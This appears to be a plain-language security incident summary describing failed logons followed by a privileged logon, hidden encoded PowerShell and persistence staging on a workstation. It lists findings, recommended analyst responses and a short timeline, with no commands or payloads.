Severity
High
Authentication abuse to PowerShell execution.
This plain-language view shows the case without raw telemetry. One external source repeatedly failed to log in, then successfully accessed a privileged account and began hidden post-authentication activity on the host.
Host
WS-FIN-07
Primary source
203.0.113.24
Failed logons
5
Basic overview
The case becomes important because the same source that generated repeated failed logons later succeeded against a privileged account. That access was then followed by hidden PowerShell, outbound communication, file creation, and a persistence step.
Findings
Repeated authentication failures from a single external IP
5 failed logons were recorded from 203.0.113.24 before a successful logon against a privileged account.
Suspicious success after failures
A successful 4624 network logon for it-admin followed the failure sequence from the same source IP.
Encoded PowerShell execution
Sysmon process creation telemetry captured hidden, encoded PowerShell launched through cmd.exe.
Follow-on activity consistent with persistence staging
The host made outbound connections, wrote a PowerShell script under ProgramData, and created a scheduled task.
Recommended analyst actions
- Reset the compromised account and rotate any reused credentials.
- Block and review the source IP and outbound destination IP.
- Review scheduled tasks, PowerShell logs, and other hosts for the same indicators.
- Tune detections around failed-logon bursts followed by success, encoded PowerShell, and suspicious scheduled task creation.
Timeline summary
- 09 Mar 2026, 08:11 UTC: repeated failed logons begin from one external source.
- 09 Mar 2026, 08:14 UTC: the same source achieves a successful privileged logon.
- 09 Mar 2026, 08:14 UTC: hidden encoded PowerShell starts running.
- 09 Mar 2026, 08:16 UTC: the sequence ends with persistence staging on the host.